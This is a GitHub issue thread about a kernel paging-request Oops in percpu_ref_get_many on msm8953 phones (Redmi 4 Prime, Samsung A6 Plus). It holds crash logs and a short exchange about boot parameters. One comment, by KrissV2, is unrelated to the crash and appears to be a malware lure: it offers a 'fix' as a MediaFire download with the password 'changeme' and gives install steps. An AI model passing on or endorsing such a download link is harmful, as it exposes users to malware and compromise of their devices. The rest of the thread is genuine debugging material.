msm8953-mainline/linux #212: 6.10 null pointer appears on the mainline kernel Xiaomi Redmi 4 Prime.

wu17481748, 2024-08-31:
Unable to handle kernel paging request at virtual address ffff37dd04694100
[   43.988286] Mem abort info:
[   43.988292]   ESR = 0x0000000096000004
[   43.988298]   EC = 0x25: DABT (current EL), IL = 32 bits       [   43.988304]   SET = 0, FnV = 0
[   43.988310]   EA = 0, S1PTW = 0                                [   43.988315]   FSC = 0x04: level 0 translation fault
[   43.988322] Data abort info:                                   [   43.988326]   ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000
[   43.988332]   CM = 0, WnR = 0, TnD = 0, TagAccess = 0
[   43.988338]   GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0       [   43.988345] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000041055000
[   43.988352] [ffff37dd04694100] pgd=0000000000000000, p4d=0000000000000000
[   43.988365] Internal error: Oops: 0000000096000004 [#1] PREEMPT SMP
[   43.988373] Modules linked in: wcn36xx btqcomsmd btqca bluetooth mac80211 ecdh_generic ecc libarc4 q6asm_dai q6voice_dai q6afe_clocks q6routing q6afe_dai q6voice q6adm q6asm q6afe snd_q6dsp_common q6mvm q6cvp q6cvs q6voice_common q6core apr pdr_interface snd_seq_dummy snd_seq wcnss_ctrl qrtr_smd snd_seq_device crct10dif_ce leds_aw2013 snd_soc_msm8916_digital qcom_q6v5_pas snd_soc_apq8016_sbc qcom_wcnss_pil snd_soc_qcom_common qcom_q6v5_mss edt_ft5x06 qcom_pil_info qcom_q6v5 qcom_sysmon venus_dec venus_enc videobuf2_dma_contig qcom_spmi_vadc qcom_spmi_temp_alarm qcom_vadc_common qcom_pon snd_soc_msm8916_analog reboot_mode qcom_camss videobuf2_dma_sg venus_core videobuf2_memops yamaha_yas530 s5k2xx ov5670 v4l2_mem2mem videobuf2_v4l2 v4l2_fwnode videobuf2_common v4l2_async bmi160_i2c ltr501 bmi160_core videodev industrialio_triggered_buffer kfifo_buf mc qrtr qcom_memshare snd_soc_aw8738 rmtfs_mem socinfo cfg80211 rfkill ledtrig_pattern fuse ip_tables x_tables ipv6 ipa2_lite qcom_common qmi_helpers panel_mdss_r63350 msm
[   43.988558]  mdt_loader drm_exec gpu_sched drm_display_helper drm_kms_helper rtc_pm8xxx drm i2c_qcom_cci drm_panel_orientation_quirks
[   43.988591] CPU: 5 PID: 1177 Comm: tracker-extract Tainted: G        W          6.10.0-waz-msm8953-mainline-dirty #19
[   43.988600] Hardware name: Xiaomi Redmi 4 Prime (DT)
[   43.988606] pstate: 800000c5 (Nzcv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[   43.988614] pc : percpu_ref_get_many+0x1c/0xbc
[   43.988629] lr : percpu_ref_get_many+0x1c/0xbc
[   43.988637] sp : ffff8000857ebab0
[   43.988642] x29: ffff8000857ebab0 x28: ffff37dd04694100 x27: ffff8000857ebbb0
[   43.988654] x26: ffff0000018a4400 x25: 00000000fffffff8 x24: ffff80008133d690
[   43.988666] x23: 0000000000000000 x22: ffff000004694100 x21: ffff37dd04694100
[   43.988677] x20: ffff37dd04694100 x19: 0000000000000001 x18: ffff8000857ebc58
[   43.988688] x17: 0000000000000000 x16: 1fffe00001098e21 x15: 0000000000000001                                                    [   43.988699] x14: 0000ffffaa10f000 x13: ffff00000ae1b508 x12: 0000000000000003
[   43.988710] x11: 0000ffffaa10efff x10: ffff800080d4d680 x9 : 0000ffffa8252000                                                    [   43.988722] x8 : 0000000000000030 x7 : ffff80003e86e000 x6 : ffff8000857eba70
[   43.988733] x5 : ffff800081339bc8 x4 : ffff80003e86e000 x3 : ffff80003e86e000                                                    [   43.988744] x2 : ffff000008e7a000 x1 : ffff0000023eb300 x0 : 0000000000000001
[   43.988756] Call trace:                                        [   43.988762]  percpu_ref_get_many+0x1c/0xbc
[   43.988771]  refill_obj_stock+0x5c/0x154
[   43.988780]  __memcg_slab_free_hook+0xb4/0x1bc
[   43.988789]  kmem_cache_free+0x1d0/0x2b0                       [   43.988799]  __vm_area_free+0x3c/0x4c
[   43.988809]  remove_vma+0x50/0x74                              [   43.988818]  exit_mmap+0x160/0x278
[   43.988826]  __mmput+0x38/0x154
[   43.988833]  mmput+0x50/0x5c
[   43.988841]  do_exit+0x24c/0x8e4                               [   43.988851]  do_group_exit+0x34/0x90
[   43.988860]  pid_child_should_wake+0x0/0x5c
[   43.988870]  invoke_syscall+0x48/0x118
[   43.988880]  el0_svc_common.constprop.0+0x40/0xe0
[   43.988889]  do_el0_svc+0x1c/0x28                              [   43.988897]  el0_svc+0x34/0xdc
[   43.988907]  el0t_64_sync_handler+0x100/0x12c
[   43.988915]  el0t_64_sync+0x190/0x194
[   43.988927] Code: a90153f3 aa0003f4 aa0103f3 97f93b17 (f9400280)
[   43.988936] ---[ end trace 0000000000000000 ]---
[   43.996899] pstore: backend (ramoops) writing error (-28)      [   43.996921] note: tracker-extract[1177] exited with irqs disabled
[   43.997425] Fixing recursive fault but reboot is needed!

KrissV2, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

vldly, 2024-08-31:
I've caught similar crash on 6.9.0/a6plte. When did it happen? Can you reproduce it?
```
[11083.376024] Unable to handle kernel paging request at virtual address 00000ea700000000
[11083.376053] Mem abort info:
[11083.376055]   ESR = 0x0000000096000004
[11083.376058]   EC = 0x25: DABT (current EL), IL = 32 bits
[11083.376063]   SET = 0, FnV = 0
[11083.376066]   EA = 0, S1PTW = 0
[11083.376069]   FSC = 0x04: level 0 translation fault
[11083.376072] Data abort info:
[11083.376073]   ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000
[11083.376077]   CM = 0, WnR = 0, TnD = 0, TagAccess = 0
[11083.376081]   GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0
[11083.376085] [00000ea700000000] address between user and kernel address ranges
[11083.376092] Internal error: Oops: 0000000096000004 [#1] PREEMPT SMP
[11083.376100] Modules linked in: wcn36xx mac80211 libarc4 cfg80211 btqcomsmd btqca nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 bluetooth ecdh_generic ecc rfkill wcnss_ctrl ipv6 q6asm_dai q6voice_dai q6routing q6afe_dai q6voice q6afe_clocks fuse q6adm q6asm q6cvs q6cvp q6mvm q6afe snd_q6dsp_common q6voice_common q6core apr pdr_interface qrtr_smd st_lsm6dsx_spi venus_enc venus_dec videobuf2_dma_contig sr556 s5k2xx qcom_camss crct10dif_ce snd_soc_apq8016_sbc gpio_vibra venus_core leds_sm570x_flash snd_soc_qcom_common snd_soc_msm8916_digital qcom_q6v5_pas led_class_flash qcom_wcnss_pil videobuf2_dma_sg snd_soc_tfa9872 v4l2_mem2mem videobuf2_memops qrtr videobuf2_v4l2 v4l2_fwnode qcom_q6v5_mss videobuf2_common v4l2_async st_lsm6dsx_i2c videodev qcom_pil_info st_lsm6dsx qcom_q6v5 ipa2_lite industrialio_triggered_buffer qcom_sysmon mc kfifo_buf qcom_pon qcom_spmi_temp_alarm snd_soc_msm8916_analog qcom_common reboot_mode rtc_pm8xxx qcom_memshare rmtfs_mem socinfo
[11083.376303]  i2c_qcom_cci qmi_helpers [last unloaded: zsmalloc]
[11083.376315] CPU: 3 PID: 5265 Comm: gsd-media-keys Not tainted 6.9.0-postmarketos-qcom-msm8953+ #493
[11083.376325] Hardware name: Samsung A6-Plus LTE Rev.4 (DT)
[11083.376329] pstate: 800000c5 (Nzcv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[11083.376337] pc : percpu_ref_get_many+0x1c/0xc0
[11083.376362] lr : percpu_ref_get_many+0x1c/0xc0
[11083.376369] sp : ffffffc084efbc20
[11083.376372] x29: ffffffc084efbc20 x28: 00000ea700000000 x27: ffffffc084efbd30
[11083.376381] x26: ffffff80020033c0 x25: 00000000fffffff8 x24: ffffffc081ba3b80
[11083.376390] x23: 0000000000000000 x22: ffffff8010809640 x21: 00000ea700000000
[11083.376399] x20: 00000ea700000000 x19: 0000000000000001 x18: 0000000000000000
[11083.376407] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000
[11083.376415] x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000
[11083.376423] x11: 0000000000000000 x10: 0000000000000000 x9 : ffffffc080377d64
[11083.376432] x8 : ffffff8009392c90 x7 : 0000000000000030 x6 : ffffffc03e433000
[11083.376440] x5 : ffffffc081989b88 x4 : fffffffffffff1c8 x3 : ffffffc03e433000
[11083.376448] x2 : ffffffc081a32a00 x1 : ffffff80112aa180 x0 : 0000000000000001
[11083.376458] Call trace:
[11083.376464]  percpu_ref_get_many+0x1c/0xc0
[11083.376471]  refill_obj_stock+0x64/0x168
[11083.376479]  obj_cgroup_uncharge+0x1c/0x30
[11083.376489]  __memcg_slab_free_hook+0xbc/0x1c0
[11083.376500]  kfree+0x230/0x250
[11083.376508]  free_pipe_info+0xc0/0xd8
[11083.376518]  pipe_release+0x110/0x130
[11083.376525]  __fput+0x80/0x2d8
[11083.376536]  __fput_sync+0x58/0x70
[11083.376544]  __arm64_sys_close+0x40/0x90
[11083.376553]  invoke_syscall+0x50/0x128
[11083.376565]  el0_svc_common.constprop.0+0x48/0xf0
[11083.376573]  do_el0_svc+0x24/0x38
[11083.376581]  el0_svc+0x34/0xd8
[11083.376591]  el0t_64_sync_handler+0x120/0x130
[11083.376598]  el0t_64_sync+0x190/0x198
[11083.376609] Code: a90153f3 aa0003f4 aa0103f3 97f7555e (f9400280) 
[11083.376619] ---[ end trace 0000000000000000 ]---
[11083.391700] detected fb_set_par error, error code: -16
[11083.398467] Kernel panic - not syncing: Oops: Fatal exception
[11083.398495] SMP: stopping secondary CPUs
[11083.598540] Kernel Offset: disabled
[11083.598547] CPU features: 0x0,00000040,00100000,0200421b
[11083.598556] Memory Limit: none
[11083.617529] Rebooting in 120 seconds..
```

wu17481748, 2024-09-03:
> 我在 6.9.0/a6plte 上遇到了类似的崩溃。它是什么时候发生的？你能重现它吗？
> 
> ```
> [11083.376024] Unable to handle kernel paging request at virtual address 00000ea700000000
> [11083.376053] Mem abort info:
> [11083.376055]   ESR = 0x0000000096000004
> [11083.376058]   EC = 0x25: DABT (current EL), IL = 32 bits
> [11083.376063]   SET = 0, FnV = 0
> [11083.376066]   EA = 0, S1PTW = 0
> [11083.376069]   FSC = 0x04: level 0 translation fault
> [11083.376072] Data abort info:
> [11083.376073]   ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000
> [11083.376077]   CM = 0, WnR = 0, TnD = 0, TagAccess = 0
> [11083.376081]   GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0
> [11083.376085] [00000ea700000000] address between user and kernel address ranges
> [11083.376092] Internal error: Oops: 0000000096000004 [#1] PREEMPT SMP
> [11083.376100] Modules linked in: wcn36xx mac80211 libarc4 cfg80211 btqcomsmd btqca nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 bluetooth ecdh_generic ecc rfkill wcnss_ctrl ipv6 q6asm_dai q6voice_dai q6routing q6afe_dai q6voice q6afe_clocks fuse q6adm q6asm q6cvs q6cvp q6mvm q6afe snd_q6dsp_common q6voice_common q6core apr pdr_interface qrtr_smd st_lsm6dsx_spi venus_enc venus_dec videobuf2_dma_contig sr556 s5k2xx qcom_camss crct10dif_ce snd_soc_apq8016_sbc gpio_vibra venus_core leds_sm570x_flash snd_soc_qcom_common snd_soc_msm8916_digital qcom_q6v5_pas led_class_flash qcom_wcnss_pil videobuf2_dma_sg snd_soc_tfa9872 v4l2_mem2mem videobuf2_memops qrtr videobuf2_v4l2 v4l2_fwnode qcom_q6v5_mss videobuf2_common v4l2_async st_lsm6dsx_i2c videodev qcom_pil_info st_lsm6dsx qcom_q6v5 ipa2_lite industrialio_triggered_buffer qcom_sysmon mc kfifo_buf qcom_pon qcom_spmi_temp_alarm snd_soc_msm8916_analog qcom_common reboot_mode rtc_pm8xxx qcom_memshare rmtfs_mem socinfo
> [11083.376303]  i2c_qcom_cci qmi_helpers [last unloaded: zsmalloc]
> [11083.376315] CPU: 3 PID: 5265 Comm: gsd-media-keys Not tainted 6.9.0-postmarketos-qcom-msm8953+ #493
> [11083.376325] Hardware name: Samsung A6-Plus LTE Rev.4 (DT)
> [11083.376329] pstate: 800000c5 (Nzcv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
> [11083.376337] pc : percpu_ref_get_many+0x1c/0xc0
> [11083.376362] lr : percpu_ref_get_many+0x1c/0xc0
> [11083.376369] sp : ffffffc084efbc20
> [11083.376372] x29: ffffffc084efbc20 x28: 00000ea700000000 x27: ffffffc084efbd30
> [11083.376381] x26: ffffff80020033c0 x25: 00000000fffffff8 x24: ffffffc081ba3b80
> [11083.376390] x23: 0000000000000000 x22: ffffff8010809640 x21: 00000ea700000000
> [11083.376399] x20: 00000ea700000000 x19: 0000000000000001 x18: 0000000000000000
> [11083.376407] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000
> [11083.376415] x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000
> [11083.376423] x11: 0000000000000000 x10: 0000000000000000 x9 : ffffffc080377d64
> [11083.376432] x8 : ffffff8009392c90 x7 : 0000000000000030 x6 : ffffffc03e433000
> [11083.376440] x5 : ffffffc081989b88 x4 : fffffffffffff1c8 x3 : ffffffc03e433000
> [11083.376448] x2 : ffffffc081a32a00 x1 : ffffff80112aa180 x0 : 0000000000000001
> [11083.376458] Call trace:
> [11083.376464]  percpu_ref_get_many+0x1c/0xc0
> [11083.376471]  refill_obj_stock+0x64/0x168
> [11083.376479]  obj_cgroup_uncharge+0x1c/0x30
> [11083.376489]  __memcg_slab_free_hook+0xbc/0x1c0
> [11083.376500]  kfree+0x230/0x250
> [11083.376508]  free_pipe_info+0xc0/0xd8
> [11083.376518]  pipe_release+0x110/0x130
> [11083.376525]  __fput+0x80/0x2d8
> [11083.376536]  __fput_sync+0x58/0x70
> [11083.376544]  __arm64_sys_close+0x40/0x90
> [11083.376553]  invoke_syscall+0x50/0x128
> [11083.376565]  el0_svc_common.constprop.0+0x48/0xf0
> [11083.376573]  do_el0_svc+0x24/0x38
> [11083.376581]  el0_svc+0x34/0xd8
> [11083.376591]  el0t_64_sync_handler+0x120/0x130
> [11083.376598]  el0t_64_sync+0x190/0x198
> [11083.376609] Code: a90153f3 aa0003f4 aa0103f3 97f7555e (f9400280) 
> [11083.376619] ---[ end trace 0000000000000000 ]---
> [11083.391700] detected fb_set_par error, error code: -16
> [11083.398467] Kernel panic - not syncing: Oops: Fatal exception
> [11083.398495] SMP: stopping secondary CPUs
> [11083.598540] Kernel Offset: disabled
> [11083.598547] CPU features: 0x0,00000040,00100000,0200421b
> [11083.598556] Memory Limit: none
> [11083.617529] Rebooting in 120 seconds..
> ```

Randomly occurring ！Shutdown, restart, have probability of getting stuck

barni2000, 2024-10-15:
@wu17481748 Which cmdline parameters are you using?

wu17481748, 2024-10-15:
> @wu17481748 Which cmdline parameters are you using?

--cmdline "console=tty0 root=UUID=ca75d86b-244e-49cf-8b21-ac05cfbbe733 rw loglevel=3 splash" \

barni2000, 2024-10-15:
> > @wu17481748 Which cmdline parameters are you using?
> 
> --cmdline "console=tty0 root=UUID=ca75d86b-244e-49cf-8b21-ac05cfbbe733 rw loglevel=3 splash" \

Check without `console`

closed 2025-12-03 by vldly